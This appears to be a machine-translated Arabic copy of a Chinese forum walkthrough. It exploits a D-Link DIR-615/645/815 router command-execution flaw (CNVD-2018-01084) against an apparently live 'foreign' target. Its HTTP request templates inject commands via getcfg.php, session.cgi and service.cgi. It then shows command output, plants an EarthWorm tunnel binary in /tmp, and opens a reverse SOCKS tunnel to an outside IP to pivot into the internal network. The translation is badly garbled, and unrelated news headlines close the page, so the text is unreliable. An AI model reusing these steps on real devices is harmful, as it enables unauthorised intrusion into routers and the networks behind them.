انظر كيف يمكنني استخدام مشروع علة إطار التوجيه السيطرة الأجنبية

الاختبار، واستخدام D لينك الموجه عن بعد الضعف تنفيذ الأوامر (CNVD-2018-01084)، سمعت هذا ابن عم كبير اسمه D-لينك، ويعرف فقط لبيع، لا أعرف إصلاح، ومن ناحية مست ذلك لمسة، لذلك خصيصا ليأتي لتشغيله.

تنبيه: جهاز التوجيه للهجوم كما الموجه الأجانب، لا تلمس أي قضايا قانونية المحلية!

أخذنا المنشعب ابن عم اللاعبين الكبار: إطار مشروع علة في رسالة تأكيد الأولي الجهاز الهدف.

STEP 1

نستخدمها لبرنامج الكشف عن توجيه كلمة D لينك، وجهاز اختبار الهدف موجودا دي لينك الموجه عن بعد الضعف تنفيذ الأوامر (RCE).

يمكننا أن نرى أن هناك ضعف الهدف الكشف عن كلمة السر، والهدف هو أيضا من المرجح جدا الوجود RCE.

وحدة .Bpf لاستخدام التعليمات البرمجية التالية:

zbz > 1 / zbz >

bz1 >

dzkz > /getcfg.php / dzkz >

sfjt > بعد / sfjt >

عرض > SERVICES = DEVICE.ACCOUNT / عرض >

البنود > إتصال: المحافظة على الحياة

استعرض ترميز: غزيب، يدحض

قبول: * / *

عامل المستخدم: بيثون طلبات / 2.18.4

نوع المحتوى: التطبيق / x-شبكة الاتصالات العالمية urlencoded شكل؛ محارف = UTF-8

المضيف: المضيف المحلي

كوكي: رمز المستخدم = OwHZilJVQa

المحتوى طول: 23 / البنود >

/ bz1 >

بيسة > النسخة تأثير البرامج الثابتة:

دي لينك DIR 615/645/815 / بيسة >

ثم نقوم اختبار جدوى في ظل RCE.

br0 رابط ENCAP: إيثرنت HWaddr FC: 75: 16: A3: 4D: 8A

 إنت ADDR: 192.168.0.1 Bcast: 192.168.0.255 قناع: 255.255.255.0

 inet6 ADDR: FE80 :: fe75: 16ff: fea3: 4d8a / 64 النطاق: لينك

 UP BROADCAST RUNNING MULTICAST MTU: 1500 متري: 1

 الحزم RX: 5242601 الأخطاء: 0 انخفض: 0 تجاوزات: 0 الإطار: 0

 الحزم TX: 8813744 الأخطاء: 0 انخفض: 0 تجاوزات: 0 الناقل: 0

 اصطدام: 0 txqueuelen: 0

 RX بايت: 820199842 (782.2 ميغابايت) TX بايت: 1538717378 (1.4 بنك الخليج الدولي)

BR1 رابط ENCAP: إيثرنت HWaddr 6E: CE: D5: 9F: 11: AF

 إنت ADDR: 192.168.1.1 Bcast: 192.168.1.255 قناع: 255.255.255.0

 inet6 ADDR: FE80 :: 6cce: d5ff: fe9f: 11af / 64 النطاق: لينك

 UP BROADCAST RUNNING MULTICAST MTU: 1500 متري: 1

 الحزم RX: 0 أخطاء: 0 انخفض: 0 تجاوزات: 0 الإطار: 0

 الحزم TX: 3663 الأخطاء: 0 انخفض: 0 تجاوزات: 0 الناقل: 0

 اصطدام: 0 txqueuelen: 0

 RX بايت: 0 (0.0 B) TX بايت: 183474 (179.1 كيلوبايت)

نجاح تنفيذ الأمر إفكونفيغ، من المعلومات التي تم إرجاعها، يمكننا أن نرى فرعية حيث الجهاز الهدف، ويمكن الاستدلال على تنفيذ نظام التشغيل الهدف من الأمر، بطبيعة الحال، وهدفنا هو جهاز توجيه، جزءا لا يتجزأ من لينكس لا يتطلب هذا النظام الكثير من التفكير.

كود الوحدة هي كما يلي:

cs1mc > القيادة / cs1mc >

zbz > 3 / zbz >

bz1 >

dzkz > /getcfg.php / dzkz >

sfjt > بعد / sfjt >

عرض > SERVICES = DEVICE.ACCOUNT / عرض >

مركز السيطرة على الأمراض > اسم > المشرف / اسم >

  usrid > / usrid >

  كلمة المرور > القرص المضغوط > / كلمة المرور > / مركز السيطرة على الأمراض >

البنود > إتصال: المحافظة على الحياة

استعرض ترميز: غزيب، يدحض

قبول: * / *

عامل المستخدم: بيثون طلبات / 2.18.4

نوع المحتوى: التطبيق / x-شبكة الاتصالات العالمية urlencoded شكل؛ محارف = UTF-8

المضيف: المضيف المحلي

كوكي: رمز المستخدم = OwHZilJVQv / البنود >

/ bz1 >

BZ2 >

dzkz > /session.cgi / dzkz >

sfjt > بعد / sfjt >

عرض > ACTION = login_plaintext وPASSWD = القرص المضغوط / > وCAPTCHA = & USER = المشرف وREPORT_METHOD = أكس / عرض >

البنود > إتصال: المحافظة على الحياة

استعرض ترميز: غزيب، يدحض

قبول: * / *

عامل المستخدم: بيثون طلبات / 2.18.4

نوع المحتوى: التطبيق / x-شبكة الاتصالات العالمية urlencoded شكل؛ محارف = UTF-8

المضيف: المضيف المحلي

كوكي: رمز المستخدم = OwHZilJVQv / البنود >

/ BZ2 >

bz3 >

dzkz > /service.cgi / dzkz >

sfjt > بعد / sfjt >

عرض > EVENT = CHECKFW 26 CS1 / > 26 / عرض >

البنود > المضيف: المضيف المحلي

عامل المستخدم: الثعبان urllib / 2.7

إتصال: المحافظة على الحياة

كوكي: رمز المستخدم = OwHZilJVQv

نوع المحتوى: التطبيق / x-شبكة الاتصالات العالمية urlencoded شكل؛ محارف = UTF-8 / البنود >

/ bz3 >

بيسة > النسخة تأثير البرامج الثابتة:

دي لينك DIR 615/645/815 / بيسة >

ومع ذلك، وهدفنا هو ليس هنا، في البداية لاختبار تنفيذ الأمر مجلد مشترك، نقوم بتنفيذ الأمر التالي.

 نسخ رمز في عرض نص عادي

؟

1

مجلد مشترك -q

العودة إلى الملقم HFS الزيارات الرأي.

التنفيذ الناجح، وبدء التخطيط ليلى الشريرة، مهلا مهلا مهلا.

STEP 2

فتح نشر في إطار مشروع خادم علة، الجوارب التكوين رصد المحلي.

بعد ذلك، الملقم الهدف لزرع على دودة الأرض (دودة الأرض)، وانا ذاهب لوضعها زرعها في الهدف \ تمة \ الدليل.

ليرة سورية /

تحميل هيكل قيادة الصامت:

مجلد مشترك ف / تمة / -q

يمكن أن ينظر إليه ديدان الأرض زرع ناجحة، والكذب / تمة / الدليل.

رفع الامتيازات ديدان الأرض:

التصريح 0777 / تمة / ew_mipsel

النتائج:

-rwxrwxrwx 10 جذر 173604 مارس 3122:05 / تمة / ew_mipsel

امتياز نجاح التصعيد!

الاستمرار في بناء أمر الجوارب انتعاش:

/ تمة / ew_mipsel -s rssocks -d 111.111.111.111 -e 888

بعد تنفيذ نفق الجوارب بنجاح ارتد خلق بنجاح!

STEP 3

نحن تحميل Sockscap64، دفق البيانات الشبكة المحلية للانتقال عبر نفق الجوارب.

نفق فتح بنجاح!

ثم، وشحذ شبكة داخليا.

يا ~~، الماسح الضوئي قد يكون لها بعض المشاكل، وربما أحتاج لاستكشاف الأسباب الكامنة وراء ......

الكاتب: التنين، وأعيد طبعه من: الشبكي: //bbs.ichunqiu.com/forum.php وزارة الدفاع = viewthread والدار = 37051؟

نرحب بكم في مجموعات صغيرة لمناقشة الشراكات: 738569199

الأحكام ذات الصلة

ألعاب شقيقة اللعب مع المفضلة لديك ضل يراهن حالة APP، وكسر بسهولة

يانتشنغ: "أنا أحبك عناق لي" معركة حاسمة "جائزة نجوم"

هناك الكثير من كلمات السر الضعيفة معين الصناعي 4G الموجهات

المال، ووضع العمال لم الاجتماعي بعث المحتالون إلى الوراء

إجراءات أمنية شبكة التشطيب من خمس نصائح صغيرة

تشونغ مينغ محطة المترو يقع على بعد ثلاثة! لمن الطراز العالمي للبيئة الجزيرة لا تريد سدت

تظهر الأثرياء من خطف ثرواتهم من نهاية طريق طويل وراء المشهد الأعمال والدهم

لماذا أرفض أن يكون تصنيفها؟ شنغهاي كومة من القمامة كل أسبوعين في "برج جين ماو"

وانغ لي من يونان إلى 21 شخصا، والحق في الأمل يان يي تسوى بينغ يانغ Yunheng ذلك قبل تعيينهم

عصر الإنترنت يحتاج الخاصة "NianJiu القديم" لها | مشروع المراقبة

جيا تشانغ كه، وهو رجل أعمال لا يحب الأدب ليس مدير جيد

هجوم ضد تحليل العينة المحلي IP دوس